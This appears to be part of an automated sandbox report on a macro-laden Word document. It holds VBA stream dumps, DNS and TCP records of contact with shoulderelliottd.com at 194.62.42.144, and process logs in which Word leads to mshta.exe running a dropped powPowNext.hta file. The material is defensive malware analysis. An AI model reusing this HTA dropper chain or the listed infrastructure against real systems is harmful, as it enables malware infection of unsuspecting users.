                                                                                                                                              Data ASCII:. K * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * \\ C N o r m a l r U . . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ . . . . . . . ~ V . . . . . . . . . . . . . . . " . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . O . ) . 2 . . X + . . .
                                                                                                                                              Data Raw:93 4b 2a b2 03 00 10 00 00 00 ff ff 00 00 00 00 01 00 02 00 ff ff 00 00 00 00 01 00 00 00 00 00 00 00 00 00 01 00 02 00 00 00 00 00 00 00 01 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 05 00 01 00 09 00 00 00 2a 5c 43 4e 6f 72 6d 61 6c 72 55 c0 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 06 00 00 00 00 00 00
                                                                                                                                              Stream Path: VBA/__SRP_1, File Type: data, Stream Size: 209
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/__SRP_1
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:209
                                                                                                                                              Entropy:2.03643843122
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:r U @ . . . . . . . @ . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . ~ z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . d o w G i r l L o a d \\ . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:72 55 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 02 00 00 00 00 00 00 7e 7a 00 00 00 00 00 00 7f 00 00 00 00 00 00 00 00 12 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 ff ff ff ff ff ff ff ff 06 00 00 00 00 00
                                                                                                                                              Stream Path: VBA/__SRP_2, File Type: data, Stream Size: 835
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/__SRP_2
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:835
                                                                                                                                              Entropy:2.00768639044
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:r U . . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` . . . a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ` i . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:72 55 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 38 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 03 00 50 00 00 00 00 00 00 00 00 00 00 00 03 00 03 00 00 00 00 00 01 00 01 00 00 00 01 00 d1 08 00 00 00 00 00 00 00 00 00 00 01 09 00 00 00 00 00 00 00 00 00 00 31 09
                                                                                                                                              Stream Path: VBA/__SRP_3, File Type: data, Stream Size: 290
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/__SRP_3
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:290
                                                                                                                                              Entropy:2.16919875755
                                                                                                                                              Base64 Encoded:False
                                                                                                                                              Data ASCII:r U @ . . . . . . . . . . . . . . . @ . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . @ . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . P . . . . . . . . . . . . . . . . ` . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . O . 8 . . . . . . . . . . . . . . . . ` . . . . 8 . . . . . . . . . . . . . . .
                                                                                                                                              Data Raw:72 55 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 00 00 00 00 00 00 00 11 00 00 00 00 00 00 00 00 00 02 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00 78 00 00 00 08 00 40 00 e1 01 00 00 00 00 00 00 00 00 02 00 00 00 04 60 04 01 e1 0d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 00 00 00 00
                                                                                                                                              Stream Path: VBA/dir, File Type: data, Stream Size: 711
                                                                                                                                              General
                                                                                                                                              Stream Path:VBA/dir
                                                                                                                                              File Type:data
                                                                                                                                              Stream Size:711
                                                                                                                                              Entropy:6.38404585368
                                                                                                                                              Base64 Encoded:True
                                                                                                                                              Data ASCII:. . . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . P r o j e c t . Q . ( . . @ . . . . . = . . . . . l . . . . . . . . . @ Y . c . . . . J . < . . . . . r s t d . o l e > . . s . t . . d . o . l . e P . . . h . % ^ . . * . \\ G { 0 0 0 2 0 . 4 3 0 - . . . . C . . . . . . . 0 0 4 6 } # . 2 . 0 # 0 # C : . \\ W i n d o w s . \\ S y s t e m 3 . 2 \\ . e 2 . t l b . # O L E A u t . o m a t i o n . ` . . . . E N o r m a l . . E N . C r . m . a Q . F . . . . . . . * , \\ C . . . . ? . m . .
                                                                                                                                              Data Raw:01 c3 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 07 00 1c 00 50 72 6f 6a 65 63 74 05 51 00 28 00 00 40 02 14 06 02 14 3d ad 02 0a 07 02 6c 01 14 08 06 12 09 02 12 80 40 59 83 63 0e 00 0c 02 4a 12 3c 02 0a 16 00 01 72 73 74 64 10 6f 6c 65 3e 02 19 73 00 74 00 00 64 00 6f 00 6c 00 65 50 00 0d 00 68 00 25 5e 00 03 2a 00 5c 47 7b 30 30

                                                                                                                                              Network Behavior

                                                                                                                                              Network Port Distribution

                                                                                                                                              TCP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Nov 12, 2021 21:13:35.421227932 CET4978380192.168.2.4194.62.42.144
                                                                                                                                              Nov 12, 2021 21:13:38.426528931 CET4978380192.168.2.4194.62.42.144
                                                                                                                                              Nov 12, 2021 21:13:44.442676067 CET4978380192.168.2.4194.62.42.144

                                                                                                                                              UDP Packets

                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                              Nov 12, 2021 21:13:35.370361090 CET5585453192.168.2.48.8.8.8
                                                                                                                                              Nov 12, 2021 21:13:35.405386925 CET53558548.8.8.8192.168.2.4

                                                                                                                                              DNS Queries

                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                              Nov 12, 2021 21:13:35.370361090 CET192.168.2.48.8.8.80x9123Standard query (0)shoulderelliottd.comA (IP address)IN (0x0001)

                                                                                                                                              DNS Answers

                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                              Nov 12, 2021 21:13:35.405386925 CET8.8.8.8192.168.2.40x9123No error (0)shoulderelliottd.com194.62.42.144A (IP address)IN (0x0001)

                                                                                                                                              Code Manipulations

                                                                                                                                              Statistics

                                                                                                                                              Behavior

                                                                                                                                              Click to jump to process

                                                                                                                                              System Behavior

                                                                                                                                              General

                                                                                                                                              Start time:21:13:26
                                                                                                                                              Start date:12/11/2021
                                                                                                                                              Path:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
                                                                                                                                              Imagebase:0xc70000
                                                                                                                                              File size:1937688 bytes
                                                                                                                                              MD5 hash:0B9AB9B9C4DE429473D6450D4297A123
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:21:13:32
                                                                                                                                              Start date:12/11/2021
                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:c:\windows\explorer c:\users\public\powPowNext.hta
                                                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                                                              File size:3933184 bytes
                                                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:21:13:32
                                                                                                                                              Start date:12/11/2021
                                                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                              Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                                                              File size:3933184 bytes
                                                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              General

                                                                                                                                              Start time:21:13:33
                                                                                                                                              Start date:12/11/2021
                                                                                                                                              Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                              Commandline:"C:\Windows\SysWOW64\mshta.exe" "C:\Users\Public\powPowNext.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
                                                                                                                                              Imagebase:0xa90000
                                                                                                                                              File size:13312 bytes
                                                                                                                                              MD5 hash:7083239CE743FDB68DFC933B7308E80A
                                                                                                                                              Has elevated privileges:true
                                                                                                                                              Has administrator privileges:true
                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                              Reputation:high

                                                                                                                                              Disassembly

                                                                                                                                              Code Analysis

                                                                                                                                              Reset < >